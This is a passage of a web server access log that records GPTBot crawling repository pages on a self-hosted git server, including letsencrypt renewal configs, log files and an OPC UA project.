"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:14:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39565] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:14:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27244] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:14:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:14:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42200] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:14:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:14:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44635] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:14:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11710] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:14:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42031] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:14:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 74.7.227.38] [Length 10499] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:14:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 69112] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71799] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151600] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 142892] [Gzip 15.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" +[17/Feb/2026:14:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 558433] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" +[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 558058] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" +[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 11093] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 11086] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11489] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 11494] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13921] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" +[17/Feb/2026:14:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71821] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 132464] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 626287] [Gzip 15.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 10127] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:14:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 10124] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 9874] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:14:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 10728] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 